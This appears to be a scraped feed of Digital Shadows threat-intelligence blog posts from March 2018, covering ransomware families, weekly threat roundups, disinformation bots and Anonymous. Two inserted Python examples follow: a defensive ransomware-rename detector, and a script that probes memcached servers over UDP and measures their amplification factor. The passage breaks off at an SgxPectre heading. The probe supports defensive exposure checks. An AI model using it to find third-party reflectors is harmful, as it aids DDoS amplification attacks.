RSA Conference 2018 – Digital Shadows Wed, 28 Mar 2018 05:04:16 +0000 RSA Conference is almost here! This year’s conference theme is “Now Matters,” looking at the quick impact threats can have to enterprises globally if we don’t find them today.

Today we see the perfect storm for digital risk and cyber threats. There are more exposure points, more sophisticated attacks, more things to protect, and increased regulations. Security leaders are faced with new challenges every day including:

  • Constant attacks from cyber criminals
  • Employees and third parties exposing sensitive data
  • Limited resources & security talent
  • Ineffective threat intelligence tools
  • Not knowing which digital risks to prioritize
  • Limited access to data sources and language
  • Disparate point solutions
  • Expanding attack surface

I started Digital Shadows to help organizations quickly identify when they are at risk without needing to deploy tons of threat intelligence resources to scan the open, deep, and dark web for threats to their business.

At RSA Conference 2018, our security specialists will be available to walk through how we help our clients quickly identify risks such as data loss, brand impersonation, cyber threats, credential exposure, and more. If you’re interested in a quick chat, book time with us here or visit us at Booth 5107 in the North Hall.

I’m looking forward to the awesome line up of events and activities at this year’s conference and I hope to see you at our party Tuesday night at City View @ Metreon. Cheers!


The Five Families: The Most Wanted Ransomware Groups Tue, 27 Mar 2018 15:25:30 +0000 Last week we presented a webinar on “Emerging Ransomware Threats and How to Protect Your Data”. Here we discussed the latest ransomware threats and trends, as well as strategies organizations can take to strengthen their defenses and stay compliant.

The ransomware ecosystem has evolved continuously over recent years. There are new operational models such as ransomware-as-a-service (RaaS), and cybercriminals are leveraging remote entry vectors like remote desktop protocol (RDP) and JBoss application servers. Ransomware operators are also experimenting with self-propagation techniques to increase the impact of their attacks.  

With so many different variants in circulation, it can be hard to make sense of what the most critical ransomware threats are to your organization. Although we shouldn’t discount lesser known or less-popular variants, there are five main ransomware families that are prominent currently.



Locky

Locky has been active since early 2016 and has predominantly been delivered using spam emails, although the Nuclear and RIG exploit kits have also been used. This ransomware has been consistently updated, particularly with changes to the way encrypted files are appended, leading media reports to attribute different naming conventions to Locky versions, such as Zepto (named after the .zepto extension). Locky activity increased in December 2017 with the resumption of spam activity by the Necurs botnet, which delivered up to 47 million spam emails per day over the holiday period.



Cerber

Cerber has been frequently developed and distributed since its inception in February 2016, with at least six different versions of the malware developed. Significantly, Cerber is run using a RaaS model, making it a highly automated operation both for actors using the platform and for servicing ransom payments and distributing decryptors to victims. The ransomware typically uses spam email and drive-by-downloads for delivery and has been associated with the RIG and Magnitude exploit kits. Cerber encrypts victim files with a random four-letter extension. Cerber RaaS customers can alter the specific ransom demands, although average prices for unlocking files fall between $1000 and $2000.



Figure 1: Cerber decryption service homepage


DMA Locker

First detected in January 2016, DMA Locker differs from traditional ransomware variants in that it does not add a file extension to encrypted files; instead it adds an identifier to the file header. DMA Locker has been delivered via RDP as well as spam emails and the RIG exploit kit. Following a successful infection, the ransomware begins encrypting files if an Internet connection is available; if not, it installs itself and waits for a connection to be established before encrypting.


Crysis
Crysis is distributed via spam emails and compromised RDP services. Several variants exist to date. The decryption keys for the first were publicly released, enabling decryption without payment; however, the more recent variants that encrypt files with the .arena, .cobra and .dharma extensions have no publicly available decryption keys at present. Crysis also has additional capabilities, such as harvesting information from the victim machine and sending it to a command and control server. This includes credentials and information from instant messaging applications, webcams and browsers.


SamSam
Active since at least December 2015, SamSam has been used in targeted attacks against high-profile victims and large organizations in the United States, Europe and Asia. These include transport organizations, such as transit authorities, as well as the healthcare and education sectors. Unlike most variants, which rely on phishing emails and exploit kits, SamSam exploits Internet-facing JBoss application servers, then harvests administrator credentials before self-propagating and infecting all the endpoints within a network. Each infected machine is held to ransom, with demands ranging from approximately $4,000 for one machine to $33,000 for all machines within a network. SamSam is believed to be operated by a group known as Gold Lowell.



Figure 2: Overview of the top five ransomware families


Although some ransomware operators have shifted to cryptocurrency mining to make their money, it would be wrong to assume that ransomware is no longer a threat in 2018. With the above variants still in circulation, and the Colorado Department of Transportation suffering a SamSam infection on 21 February 2018, the threat from ransomware is clearly a long way from subsiding.


To that end, there are several measures organizations should take to ensure they are well protected in 2018.

  1. Regularly back up data and verify its integrity. Keep backups separate from the main corporate network and from the machines they are backing up. Use both cloud-based and physical backups.
  2. SamSam has relied on vulnerable, external-facing servers, so apply relevant patches and updates promptly.
  3. A defense-in-depth strategy aids mitigation. This includes segmenting networks, firewalling off SMB traffic, and restricting access to important data to only those who need it.
  4. Develop and practice your ransomware playbook so that all parts of the organization (operations, IT, security, legal, PR) know their role should the undesirable occur.
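As an added example, not from the webinar or from the post above, the following Python script turns two of the indicators described in the family summaries into detection logic over a file-event log: a rename to one of the extensions the post ties to Locky (.zepto) and Crysis (.arena, .cobra, .dharma), and a burst of renames on a single host to one uniform, unfamiliar extension, which is what a Cerber-style random four-letter extension looks like from the file system. The log line format, hostnames, sample events and the burst threshold are all constructed assumptions; map your own EDR or file-audit events onto the parser.

```python
"""Added example: ransomware indicators in a file-event log.

Not part of the original post. The log format below is a constructed one
(timestamp, host, operation, path, optional new path); map your EDR or file
audit events onto it. Extensions come from the post; thresholds are assumptions.
"""
import os
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Extensions the post ties to named families (illustrative, not exhaustive).
KNOWN_EXTENSIONS = {
    ".zepto": "Locky (Zepto)",
    ".arena": "Crysis",
    ".cobra": "Crysis",
    ".dharma": "Crysis",
}

# Everyday extensions users rename to legitimately; excluded from the burst heuristic.
COMMON_EXTENSIONS = {".txt", ".docx", ".xlsx", ".pptx", ".pdf", ".jpg", ".png",
                     ".tmp", ".bak", ".zip", ".log", ".csv"}

LOG_RE = re.compile(
    r"^(?P<ts>\S+) host=(?P<host>\S+) op=(?P<op>\w+) path=(?P<path>\S+)"
    r"(?: new=(?P<new>\S+))?$"
)


def parse_line(line: str):
    """Return a dict for a well-formed event line, or None for anything else."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%dT%H:%M:%S")
    return rec


def extension(path: str) -> str:
    return os.path.splitext(path)[1].lower()


def find_indicators(lines, burst_threshold=20, window=timedelta(seconds=60)):
    """Two checks: (1) any rename to a known ransomware extension;
    (2) at least burst_threshold renames on one host to the same unfamiliar
    extension within `window` (a Cerber-style random extension has no fixed
    value, so the uniform burst itself is the signal)."""
    findings = []
    renames = defaultdict(list)  # (host, ext) -> rename timestamps
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["op"] != "rename" or not rec["new"]:
            continue
        ext = extension(rec["new"])
        if ext in KNOWN_EXTENSIONS:
            findings.append({"type": "known_extension", "host": rec["host"],
                             "family": KNOWN_EXTENSIONS[ext], "path": rec["new"]})
        elif ext and ext not in COMMON_EXTENSIONS:
            renames[(rec["host"], ext)].append(rec["ts"])

    for (host, ext), stamps in renames.items():
        stamps.sort()
        best = start = 0
        for end in range(len(stamps)):          # sliding window over sorted times
            while stamps[end] - stamps[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= burst_threshold:
            findings.append({"type": "rename_burst", "host": host,
                             "extension": ext, "count": best})
    return findings


# Constructed sample: benign activity on WS02, one Locky indicator on WS03,
# a malformed line, and 25 renames on WS01 to one random-looking extension
# within 25 seconds.
SAMPLE_LOG = [
    "2018-03-27T09:00:01 host=WS02 op=create path=C:/Users/alice/report.docx",
    "2018-03-27T09:00:05 host=WS02 op=rename path=C:/Users/alice/draft.txt new=C:/Users/alice/final.txt",
    "2018-03-27T09:01:10 host=WS03 op=rename path=C:/Users/bob/invoice.pdf new=C:/Users/bob/invoice.pdf.zepto",
    "this line is malformed and is ignored",
] + [
    f"2018-03-27T09:02:{i:02d} host=WS01 op=rename path=C:/Share/doc{i}.xlsx new=C:/Share/doc{i}.a7f3"
    for i in range(25)
]

if __name__ == "__main__":
    for finding in find_indicators(SAMPLE_LOG):
        print(finding)
```

The known-extension check is cheap but only catches families whose naming is already documented; the burst heuristic is what catches a new variant, at the cost of tuning the threshold and window against your own baseline of legitimate bulk renames (build scripts, archive tools). DMA Locker, which changes the file header rather than the name, would not trip either check and needs content inspection instead.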

Subscribe to our weekly newsletter to get the latest news and research by Digital Shadows.

Shadow Talk Update – 03.26.2018 Mon, 26 Mar 2018 15:05:01 +0000 This week’s Shadow Talk discusses what the Cambridge Analytica revelations mean for disinformation and personal privacy, updates to the Trickbot, Zeus Panda and Ramnit trojans, the ransomware attack on the City of Atlanta, and the attribution of the Dragonfly campaign to the Russian government.

US pins energy-sector attacks on Russia-backed threat group

The United States government has named the threat group “Dragonfly” (aka Crouching Yeti, Energetic Bear) as responsible for attacks on the US energy sector over the past two years. The attribution was published in a technical alert that also connected Dragonfly to the Russian state. The multi-stage intrusion campaign was highly likely intended to gather intelligence, including credentials and files pertaining to industrial control systems (ICS) and associated systems; there was no indication of sabotage or disruption. The threat group allegedly used trusted third-party suppliers as a route to its ultimate targets. The naming of Dragonfly is in line with the United States’ increasingly public attribution of attacks, but is unlikely to shame the perpetrators into desisting. Instead, the attackers will likely adapt their tactics, techniques and procedures (TTPs).

Espionage group culls data from US entities with Asian interests

The suspected Chinese cyber espionage group “TEMP.Periscope” (aka Leviathan) has been cited as responsible for network intrusions of US entities with interests in the South China Sea region. To compromise networks and steal information, the group paired new tools with established tactics and techniques, including spearphishing emails and Microsoft Office exploits. The victims have not been named but, given the geopolitical conflict surrounding the South China Sea, the campaign was highly likely politically motivated and aimed at gathering intelligence. Some of the tools are associated with other suspected Chinese groups, which have also been linked to attacks on entities with interests in the same region. However, there was no indication the groups were actively collaborating, and identification of the groups is unconfirmed because many countries have interests in the South China Sea region. TEMP.Periscope has demonstrated high intent in its campaigns, and more attacks are highly likely.

Mining company extorted by thedarkoverlord

On 16 Mar 2018 breach reporting website DataBreaches[.]net reported that threat actor “thedarkoverlord” (TDO) claimed to have successfully compromised the systems of H-E Parts Morgan, a manufacturer of components for the mining industry. H-E Parts Morgan has not yet publicly commented on the reported breach; information disclosed to DataBreaches[.]net suggests the company refused TDO’s extortion demands. TDO has made no public announcement via social media in reference to this incident. This deviates from the standard modus operandi of the group, which tends to use Twitter to exert pressure on victims to pay an extortion fee.

Adware compromises supply chain, infects millions of Androids

The new adware family “RottenSys” successfully compromised a supply chain process and has infected almost five million Android devices since 2016. The malware masqueraded as a Wi-Fi service application on the devices, and used special permissions to download malicious components via a dropper. To display advertisements on devices, the attackers used a publicly available Android application virtualization framework. The perpetrators have highly likely accrued significant funds from their campaign; an estimated USD 115,000 has been earned since 12 Mar 2018 alone. As well as malvertising, the attackers appeared to be testing a new botnet using RottenSys’ command-and-control (C2) infrastructure. This botnet could be leased to other threat actors to bolster the attackers’ profits.

DDoS attack hits Russian Central Election Commission website

The website of the Russian Central Election Commission was reportedly hit by a distributed denial of service (DDoS) attack on 18 Mar 2018. The DDoS monitoring service DDoSMon reported the site was targeted using the Memcached amplification technique, a method recently adopted by a variety of threat actors. Attribution for the attack was unknown; no hacktivist or threat groups had claimed responsibility at the time of writing. The objective was almost certainly to cause disruption and degradation of service, as the timing coincided with the 2018 Russian presidential election.

APT-28 adopts new anti-sandbox evasion technique

Researchers at security company Palo Alto Networks identified two attacks, on 12 and 14 Mar 2018 respectively, targeting an unnamed European government agency with an updated version of the “DealersChoice” Flash exploitation framework. The attacks were attributed to “APT-28” (aka Fancy Bear, Sofacy). Spearphishing emails referencing a security conference were sent with a Microsoft Word (.docx) document attached. A newly observed anti-sandbox evasion technique loaded a malicious Flash object only after a user had scrolled to the third page of the document. This ensured human interaction, and evolved from the previous tactic of loading the Flash object immediately upon the document’s opening. APT-28’s continued use of this new evasion technique is highly likely.

Pop-up Twitter Bots: The Shift to Opportunistic Targeting Thu, 22 Mar 2018 16:10:39 +0000 Since the furor surrounding Russia’s alleged use of Twitter bots to influence the 2016 presidential election in the United States, social media bots have been most commonly associated with carefully planned, long-term campaigns. However, we have observed a shift whereby automated bots increasingly are established to provide an opportunistic reaction to events or individuals, in very short and targeted campaigns. Advances in artificial intelligence will likely facilitate the creation of more believable throwaway bot networks with less investment needed to deliver expedient effects.

We recently worked on a fascinating Request for Information (RFI) from a client. Without disclosing too much, the organization suspected one of its employees had been targeted by Twitter bots. Following research, it appeared our client’s suspicions were correct: bots had been automatically spamming the employee’s Twitter page. Case closed and on to the next RFI.

However, as the dust settled from the task, we began thinking that this reflected a change in the way bots are used to spread disinformation. Bots and their many variants have been around for years and are used by a range of actors in many different ways, be it ISIS “ghost tweeting” its messages to give the appearance of a wider worldwide following, fake Chinese social media posts on Weibo intended to drown out messages about bad news and politically sensitive issues or celebrities using fake followers to increase their online influence. This particular case was interesting for two reasons:

  1. The focused targeting of an individual outside of a significant geopolitical event (albeit with crudely executed content)
  2. The short-term nature of the bots’ activity, initiated in response to a specific event and ended when the campaign’s ostensible goal was achieved

From the Masses to the Individual

Mass targeted disinformation is a well-known phenomenon, given press coverage of the growing number of “troll farms” springing up globally. Since a troll farm is staffed by humans, the farm’s masters can target individual users and engage them in complex and intelligent dialog that appears authentic in its spontaneity. The Holy Grail for this type of malicious actor would be a bot that could engage millions of users with the authenticity of a human troll.

In the case of nation states, campaigns may be part of long-term projects to influence other countries’ public discourse, such as the bots used to influence British politics in the 2016 EU referendum and the subsequent election in 2017. This case was different. The bot campaign we were investigating appeared to have been established soon after particular actions by the targeted individual and disbanded immediately after the bots achieved their purpose. The “pop-up” nature of this bot campaign has been reflected in recent media stories: a widespread story about a Muslim woman walking past and ignoring injured victims of the March 2017 terror attack in Westminster has been attributed to a “fake news” bot campaign, and bots were observed attempting to influence the discourse about gun control laws following the February 2018 school shooting in Florida. This suggests actors are establishing bot networks to provide immediate, opportunistic reaction to events.


Where is this trend going in the future?

Technically, the key factor to watch is the development of artificial intelligence (AI), specifically regarding the Turing Test (a computer’s ability to convince a human user they are speaking to another human and not a computer). Given the textual, non-real-time medium of many social media platforms, computers have a distinct advantage in this area, and as early as 2014 some researchers claimed to have AI programs that could pass the Turing Test (Google “Eugene Goostman”).

With this level of authenticity, mass targeted disinformation campaigns become a realistic possibility for the disinformation peddler. These ideas have been expanded upon by authors such as Keir Giles (see: Handbook of Russian Information Warfare), who proposed scenarios whereby bots conduct mass targeted disinformation campaigns on the eve of a large-scale NATO troop mobilization. Such advances in AI also play into the hands of malicious actors creating bots for short-term purposes as they enable more believable bots to be set up swiftly, without spending months teaching bots what to say on a particular topic.

These ideas are not only interesting but important given the influence that social media-driven news and propaganda currently have across the globe. This applies to nation states at election times, but it is also relevant to businesses. You can read more about disinformation campaigns affecting organizations (as well as how to combat them) in a recent research paper of ours, “The Business of Disinformation.”

Subscribe to our weekly newsletter to get the latest news and research by Digital Shadows.

Cyber Security as Public Health Wed, 21 Mar 2018 16:09:19 +0000 Public health, one of the great 20th century ideas, has many instructive lessons for cyber security in the 21st. Let’s recap. Public health was defined by Charles-Edward Winslow in 1920 as:

“Public health is the Science and Art of preventing disease, prolonging life, and promoting health and efficiency through organized community effort for sanitation of the environment, the control of communicable disease, the education of the individual in personal hygiene, the organization of medical and nursing services for early diagnosis and preventive treatment of disease, and the development of the social machinery to insure everyone a standard of living adequate for maintenance of health, so organizing these benefits as to enable every citizen to realize his birthright of health and longevity”

While a lot has changed since 1920, including the use of the singular they, these statements still resonate today. The first statement mentions the interdisciplinary nature of the field. Cyber security truly is both an art and a science, which we will return to at the end of this blog. Let’s break down the key parts of Winslow’s definition:

This mission statement is comprehensive. It mentions both a preventative goal and a longevity goal: we need cyber security to not only be about preventing things but also encouraging the beneficial side effects of security for individuals, communities and marketplaces. The explicit reference to an organized community underlines the need for collective action. No matter how secure you may be as an organization or an individual, we work and play in a shared space. If that space resembles more the “Wild West” rather than an organized society, your experience will suffer irrespective of your own security posture. Winslow goes on to detail what needs to be done:


1.    Sanitation of the environment

  • Security engineering, especially the definition and application of secure development lifecycles, to reduce software maintenance costs and improve the reliability of software with respect to security-related bugs.
  • Community action: sharing security-related information, acting promptly on takedown requests, and applying appropriate ingress and egress filtering to block malicious traffic.


2.    Control of communicable disease

Hardening systems to make initial infection as difficult as possible (e.g., disallowing macros and DDE-enabled documents) and, in the event of infection, containing the spread as much as possible by segmenting the networks of key systems and monitoring for security events such as credential reuse.


3.    Education of the individual in personal hygiene

People are often the weakest link in security: not only the individual who clicks on a phishing email, but also the system administrator responsible for patching and securely configuring systems. Training and education are essential if individuals are to use the Internet safely, both at work and at home.


4.    Organization of medical services for early diagnoses and preventative treatment of disease

The public and private sectors need to work together so that early signs of infection, e.g., destructive outbreaks like WannaCry or NotPetya, are picked up and shared. The more collaboration there is, the better placed we all are to limit the damage from such incidents. Some public-sector organizations, such as US-CERT, already provide comprehensive alerts.

Public health covers many different disciplines, just like cyber security. This stems from the important realization that no single focus area is sufficient to improve public health. The success of vaccination programs, for example, depends on a wide range of disciplines. Cyber security, similarly, requires improvements not just in technical fields, although those are sorely needed! Politics, legal issues, regulations, economics and social organization all have a part to play. While we wrestle with the details in our daily work, it’s good to keep the big picture in mind.


Subscribe to our weekly newsletter to get the latest news and research by Digital Shadows.

Shadow Talk Update – 03.19.2018 Mon, 19 Mar 2018 14:15:48 +0000 This week’s Shadow Talk features the latest techniques in tax return fraud, claimed vulnerabilities in AMD chips, Slingshot malware targeting Mikrotik routers, and Greenflash Sundown Exploit Kit delivering Hermes ransomware.



Slingshot espionage campaign undetected for six years

A newly detected cyber espionage campaign used a compromised router as a foothold to drop malicious information-stealing components on to victims’ devices and networks. The “Slingshot” campaign has targeted almost 100 entities to date, predominantly in the Middle East and Africa. The earliest identified samples dated from 2012, which indicates the campaign has avoided detection for six years. Attribution was unconfirmed at the time of writing; however, the attackers appear to be highly skilled and well resourced, indicating they are potentially state-sponsored.


APT-15 observed targeting UK government contractor

On 10 Mar 2018, researchers at NCC Group reported new activity attributed to APT-15. Two operations impacted an unnamed UK government service provider, with attackers harvesting information pertaining to UK military and government departments. The group used two custom backdoors, custom information-gathering tools and native Windows tools to exfiltrate sensitive information. Following the first operation, which resulted in its ejection from the target network, the group used restructured tactics, techniques and procedures to re-enter the target system. The operations indicated a relatively well-resourced threat actor with a high level of intent to obtain precise information. Although APT-15 has previously been linked to China, there are insufficient indicators to support this attribution at the time of writing.


APT-28 updates operational toolkit

On 09 Mar 2018 cyber security company Kaspersky published a report describing evolutions in the toolkit and activity of APT-28, a threat group associated with the Russian state. The report assessed that the group now operates in distinct sub-divisions focused on targeting, development and coding. Researchers noted significant overlap of the group’s operations with other APT groups’ activity, including the Russian-state-linked Turla. The report also described updates to the group’s operational toolkit and noted that the group has been observed targeting entities in the Middle East and Asia. APT-28’s operational development and its continued targeting of entities within the political or military landscape correlate with previous activity attributed to the group. Therefore, it remains likely that reports of operational activity and attacks attributed to the group will increase in the short to medium term (one to six months).


CTS Labs discloses 13 alleged AMD processor vulnerabilities

On 14 Mar 2018, CTS Labs detailed 13 vulnerabilities which allegedly allowed an attacker to install malware on AMD processors and permitted access to protected information located in processor chips. CTS Labs claimed it had provided AMD with 24 hours’ notice before publicly disclosing the vulnerabilities. As no technical details were released with the research, Digital Shadows could not analyze the alleged vulnerabilities.


MuddyWater group targets Turkey, Pakistan and Tajikistan

On 12 Mar 2018, Trend Micro, a cyber security company, reported that government and telecommunications entities in Tajikistan, as well as undisclosed sectors in Turkey and Pakistan, were targeted by activity attributed to “MuddyWater”, an espionage group. The group used similar tactics, techniques and procedures to its previous activity: primarily phishing emails with macro-enabled documents to achieve initial compromise. While technical indicators in this attack overlapped with those seen in historical MuddyWater activity, the PowerShell backdoor payload used in the recent attack had been updated, likely in an attempt to remain undetected. At the time of writing there is little information available pertaining to harvested data or the entities affected. The Saudi Arabian NCSC published an advisory on MuddyWater, indicating the group presents a notable threat to targeted entities.


Middlebox HTTP injection redirects deliver spyware

On 09 Mar 2018 the research organization CitizenLab reported two campaigns using PacketLogic deep packet inspection middleboxes to conduct injected HTTP redirects. Internet service provider customers in Egypt were redirected to pages containing cryptocurrency miners in a likely financially motivated attack. Selected Turkish users accessing legitimate domains using HTTP were redirected to download surveillance tools FinFisher or a variant of StrongPity, indicating the attack’s objective was information gathering. The initial infection vector against telecom infrastructure is unknown. Users are encouraged to avoid accessing and downloading content from domains using HTTP, as network traffic is unencrypted and vulnerable to “man in the middle” attacks.


Compromised BitTorrent client distributed by download server

On 13 Mar 2018, Microsoft’s Windows Defender research team published research detailing a Smoke Loader campaign delivering CoinMiner, software that can be used to mine cryptocurrency on target systems. The activity produced approximately 500,000 attempted infections within a 12-hour period. The rapid infection rate was due to a compromised executable for the BitTorrent client “MediaGet”, which was distributed via a legitimate program download server and operated as a legitimate program with a backdoor capability that delivered the Smoke Loader downloader and dropped CoinMiner. It was unclear why Smoke Loader and CoinMiner, malware variants with high detection rates by anti-virus solutions, were deployed in an operation that likely required significant planning of the initial infection vector.



Subscribe to our weekly newsletter to get the latest podcast and other research by Digital Shadows.

Anonymous and the New Face of Hacktivism: What to Look Out For in 2018 Tue, 13 Mar 2018 15:03:05 +0000 The Anonymous collective has been the face of hacktivism since 2008. Since then, the group’s membership, operations, and structure have changed significantly. In this blog, we examine the changes in Anonymous and look at how the group will continue to change in the coming years.

The Anonymous collective rose to fame in 2008 and 2009. Emerging from the quagmire of 4chan’s /b/ board, an imageboard for “random” content (Figure 1), the group quickly gained followers after ‘Project Chanology’, a 2008/9 campaign against Scientology. This blended relatively new tactics, like mass distributed denial of service (DDoS) attacks that knocked the main Scientology websites offline, with old-school phreaking and traditional protests.

Figure 1: The original /b/ post starting Project Chanology

The group continued to gain momentum, targeting opponents of internet piracy and websites of financial institutions that had withdrawn banking facilities from Wikileaks under OpPayback in 2010. The combination of widespread, disruptive DDoS attacks and their ability to publicize their campaigns led to Time magazine naming Anonymous as one of the 100 most influential people in the world in 2012.

Although the collective continued its operations, including OpIsrael and OpIcarus, the popularity and media attention gained by the group peaked in November 2015 during OpIsis and OpParis, both operations targeting supporters of Islamic State.

So, what happened to make “one of the most influential people” in the world fade from consciousness so quickly?

1. Anonymous has reached critical mass

Simply put, the group has become too big to be effective. Contrary to its original advertising and statements, the formative stages of the group were strictly hierarchical. Operations were organized on central forums and Internet relay chat (IRC) channels, with details approved by a series of moderators. This level of coordination enabled the organization and impact of their early operations.

Conversely, the family-friendly tactics (the Anonymous term for an operation that uses only legal tactics, such as reporting accounts for takedown) of OpIsis acted as a membership recruitment drive, leading to a huge influx of members with little to no technical capability. With such a large number of people, focused operations have become harder to organize, as motives and skills diverge. Older members talk about the dilution of the brand (Figure 2). The lack of a central organizational point means that operations and attacks are diverse, uncoordinated, and largely small scale.

Figure 2: Reddit users discuss the change in the Anonymous identity

2. Anonymous no longer encapsulates the cultural Zeitgeist

From 2010, Anonymous was synonymous with populist protest for the first half of the decade. The group’s brand – the Guy Fawkes mask from the 1984 ‘V for Vendetta’ graphic novel – was linked with the Occupy movement’s early protests in 2011, and the Million Mask March, held in 2013. Anonymous became associated with anti-establishment protests.

However, in 2018, this zeitgeist has changed. The Occupy movement has largely faded from public consciousness, and global politics has moved on. The proliferation of low level operations has changed the way the public view the collective, and without publicity the impact of their operations is greatly lessened. Furthermore, the lack of media coverage and the dilution of the brand have led to an exodus of the more technically capable members to smaller groups, leaving very little of the original collective behind.

3. Anonymous lacks a popular cause

When Anonymous began, the collective played to a relatively populist agenda. Chanology responded to growing media doubts about the nature of scientology, and OpPayback played on the public profile of Wikileaks. OpIcarus captured the anti-financial sector feeling as the news broke about high financial sector salaries despite austerity and the European debt crisis. OpIsis and OpParis both linked in with huge waves of outrage after the attacks in Paris in November 2015.

Since then, the collective has been unable to find a cause that simultaneously both unites members within the collective and captures the attention of the outside world. Smaller operations have been created – OpSyria, OpTurkey, OpDomesticTerrorism – but the main attack phase has rarely lasted beyond one month, and has not been adopted by more than two or three factions. Although the group originated as a vaguely anarchic collective, there is an inherent hero complex evident in the group’s collective language: without a cause, members are likely to move on.

Given this, what’s next for the collective, and for the threat from hacktivist groups?

1. Family-friendly and opportunistic attacks

It is highly likely that central Anonymous affiliates will continue to conduct legacy operations, such as OpIsis, OpSyria, and OpDomesticTerrorism. However, as the influence and capabilities of the group are waning, these are likely to be confined to “family-friendly” and opportunistic attacks, either reporting social media accounts, or claiming DDoS attacks against smaller companies with weak cyber security.

2. Regional groups

The dilution of the central brand has coincided with a rise in the number of regional and national groups. Factions such as AnonymousBrasil, AnonymousCatalunya, and AnonPlus are all smaller, more focused, and have closer ties with regional politics. This enables them to mount persistent and targeted campaigns. Operations such as OpOlympicHacking were able to cause real disruption because AnonymousBrasil was able to coordinate activities amongst its members, and was linked to a traditional political objective. Although it is unlikely that the capabilities of these groups will grow beyond DDoS and website defacement attacks, their operations are likely to become longer and more targeted.

Figure 3: OpOlympicHacking banner, October 2016 (source: Twitter)

3. Breakaway Groups

Older members – and more nostalgic members – of the collective have already started to break away into smaller groups reminiscent of 2009. In 2017 there were a significant number of groups claiming to be LulzSec and AntiSec reborn. However, these groups are unlikely to match the impact of their namesakes: a lack of media attention and impact means that the members drift apart relatively quickly.

Figure 4: CyberGuerrilla were the first group to break away in 2014


The capabilities of the Anonymous collective were never technical: instead, they relied on causing disruption and gathering enough media attention to amplify their perceived influence. As we head into 2018 public attention has moved on, directed at threat groups with both the capability and intent to cause both destruction and disruption. The Anonymous brand is likely to live on in smaller, regional hacktivist groups who will target companies in line with regional and national geopolitical objectives, but the days of mass projects and mass campaigns are over.

Subscribe to our weekly newsletter to get the latest news and research by Digital Shadows.

Shadow Talk Update – 03.12.2018 Mon, 12 Mar 2018 15:09:50 +0000 This week’s Shadow Talk features more distributed denial of service (DDoS) attacks using Memcached servers, how disinformation is more than just a political concern, updates on the Spectre vulnerability following the release of a new proof of concept (POC) exploit, and more reporting on the historical network intrusion against the German government.

Memcached DDoS attacks break peak volume records

Attackers using Memcached reflection, a type of DDoS attack, have twice achieved the highest recorded peak volumes since 27 February. An attack on the code-sharing website GitHub reached 1.35Tbps, and a subsequent attack on an unnamed company in the United States peaked at 1.7Tbps. The peak was helped by the availability of internet-facing Memcached servers listening on user datagram protocol (UDP) port 11211 without traffic filtering. The media attention garnered by these attacks likely prompted opportunistic extortion attempts reported in the past week. Efforts have been made to reduce the number of internet-facing Memcached servers susceptible to this attack method, but the threat is unlikely to disappear in the next month.
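The practical question for a defender is whether any of your own memcached instances are one of those reflectors. The Python script below, an added example that is not from the Shadow Talk post, builds a memcached UDP request frame (the 8-byte header of request id, sequence number, datagram count and reserved field, followed by a text command), parses the frames that come back, and computes the bytes-returned-per-byte-sent ratio that makes an open server attractive to an attacker. The `probe_udp` and `is_udp_exposed` functions do real network I/O and are meant to be pointed only at hosts you are authorised to test; the `SAMPLE_RESPONSE` is a constructed reply so the parsing and ratio calculation can be exercised offline.

```python
"""Added example: does a memcached instance answer over UDP?

Not part of the Digital Shadows post. Frames follow the memcached UDP protocol
(8-byte header: request id, sequence number, datagram count, reserved). The
SAMPLE_RESPONSE below is constructed for offline testing, not captured traffic.
"""
import socket
import struct

MEMCACHED_UDP_PORT = 11211
HEADER = struct.Struct("!HHHH")  # request id, sequence no, total datagrams, reserved


def build_udp_request(command: bytes = b"stats", request_id: int = 0) -> bytes:
    """One memcached UDP datagram: 8-byte header followed by a text command."""
    return HEADER.pack(request_id, 0, 1, 0) + command + b"\r\n"


def parse_udp_response(datagram: bytes) -> dict:
    """Split a response datagram into its header fields and payload."""
    if len(datagram) < HEADER.size:
        raise ValueError("datagram shorter than memcached UDP header")
    request_id, seq, total, _reserved = HEADER.unpack_from(datagram)
    return {"request_id": request_id, "seq": seq, "total": total,
            "payload": datagram[HEADER.size:]}


def amplification_factor(request: bytes, responses) -> float:
    """Bytes returned per byte sent: the reflector's value to an attacker."""
    return sum(len(r) for r in responses) / len(request)


def probe_udp(host: str, port: int = MEMCACHED_UDP_PORT, timeout: float = 2.0) -> list:
    """Send one unauthenticated 'stats' request and collect every datagram that
    comes back. Performs real network I/O: only run it against hosts you are
    authorised to test."""
    request = build_udp_request()
    datagrams = []
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(request, (host, port))
        try:
            while True:  # a large stats reply spans several datagrams
                data, _addr = sock.recvfrom(65535)
                datagrams.append(data)
        except socket.timeout:
            pass
    return datagrams


def is_udp_exposed(host: str, port: int = MEMCACHED_UDP_PORT, timeout: float = 2.0) -> bool:
    """True if the server replied at all: any answer to a spoofable UDP request
    means it can be used as a reflector."""
    return len(probe_udp(host, port, timeout)) > 0


# Constructed response, modelled on the text format a real server uses for 'stats'.
SAMPLE_RESPONSE = HEADER.pack(0, 0, 1, 0) + (
    b"STAT pid 4242\r\nSTAT uptime 86400\r\nSTAT version 1.4.15\r\n"
    b"STAT curr_connections 10\r\nSTAT bytes 10485760\r\nEND\r\n"
)

if __name__ == "__main__":
    request = build_udp_request()
    print(parse_udp_response(SAMPLE_RESPONSE)["payload"].decode())
    print("amplification: %.1fx" % amplification_factor(request, [SAMPLE_RESPONSE]))
```

Even this small constructed reply returns several times more bytes than the 15-byte request; against a server holding large cached values the ratio is far higher, which is why unfiltered UDP on 11211 matters. The fix is to stop listening on UDP (memcached's `-U 0` option; releases from 1.5.6 default to UDP off) and to firewall 11211 from the Internet regardless, rather than to rate-limit after the fact.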


Disinformation campaign aimed at Persian speakers

A disinformation campaign intended to influence Persian speakers and discredit Western media outlets has been in operation for approximately seven years. The campaign implicated some legitimate media outlets, such as the BBC, by establishing fake websites impersonating them. No malware was delivered in this campaign. Despite the use of disinformation campaigns for political objectives, the wide availability of tools and relatively low costs associated with performing these operations means that disinformation is also a threat to businesses in a variety of industries. Download a copy of our research report, The Business of Disinformation: A Taxonomy, to see tools actors can turn to when waging disinformation campaigns and what it means for organizations in the next year.


Researchers publish PoC exploit for SgxPectre

